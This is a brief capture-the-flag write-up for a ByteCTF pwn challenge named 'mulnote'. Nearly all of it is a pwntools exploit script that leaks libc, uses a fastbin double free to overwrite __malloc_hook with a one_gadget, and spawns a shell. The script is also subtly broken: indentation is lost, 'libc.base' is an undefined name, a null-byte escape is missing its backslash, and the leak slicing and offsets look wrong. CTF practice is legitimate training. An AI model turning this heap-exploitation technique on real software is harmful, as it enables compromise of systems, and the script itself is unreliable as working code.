byte ctf (pwn)

mulnote

简单的组合攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import *
context.log_level = 'debug'

sh = process('./mulnote')
elf = ELF('mulnote')
lib = ELF('./libc.so')

def choice(achar):
sh.sendlineafter('>',achar)

def add(size,con):
sh.sendline('C')
sh.sendlineafter('>',str(size))
sh.sendlineafter('>',con)

def show():
sh.sendline('S')

def free(idx):
sh.sendline('R')
sh.sendlineafter('>',str(idx))

def edit(idx,con):
sh.sendline('E')
sh.sendlineafter('>',str(idx))
sh.sendlineafter('>',con)

########################leak libc#####################
add(0x100,'0')
add(0x20,'1')
free(0)
add(0x100,'A')
show()
libc = u64(sh.recvuntil('\x7f')[-4:].ljust(8,"\x00"))
log.success("libc = %s"%hex(libc))
libc_base = libc - 0x3c
log.success("libc_base = %s"%hex(libc_base))
malloc_hook = libc_base + lib.symbols['__malloc_hook']
one = libc.base + 0x45216
######################################
add(0x60,'3')
add(0x60,'4')
free(3)
free(4)
free(3)

add(0x60,p64(malloc_hook-0x23)) #5
add(0x60,'6')
add(0x60,'7')
add(0x60,'x00'*0x13+p64(one)) #8
sh.sendlineafter('>','C')
sh.sendlineafter('size>',1)

sh.interactive()